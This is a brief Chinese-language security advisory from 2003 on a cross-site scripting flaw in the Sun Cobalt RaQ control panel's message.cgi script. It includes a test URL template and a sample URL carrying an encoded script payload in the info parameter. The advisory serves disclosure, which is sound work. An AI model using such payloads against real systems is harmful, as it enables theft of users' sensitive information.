Sun Cobalt RaQ Message.CGI跨站脚本执行漏洞发布时间:2003-10-03 更新时间:2003-10-03 严重程度:中 威胁程度:其它 错误类型:输入验证错误 利用方式:客户机模式 BUGTRAQ ID:8757 受影响系统 Cobalt RaQ 1.1详细描述 Sun Cobalt RaQ 550的基于WEB的控制面板存在跨站脚本执行问题。 问题是message.cgi脚本对用户提交给info变量的值缺少充分过滤,可导致利用跨站脚本攻击获得用户敏感信息。 测试代码 HTTP://[HOST NAME / DOMAIN]:[PORT: 81 ]/cgi-bin/.cobalt/message/message.cgi?info=[SCRIPT / XSS CODE] 如 http://w-0.h2oformum.foo:81/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C/script%3E 解决方案 尚无 相关信息 参考:http://www.securityfocus.com/archive/1/340240/2003-10-11/2003-10-17/2 |
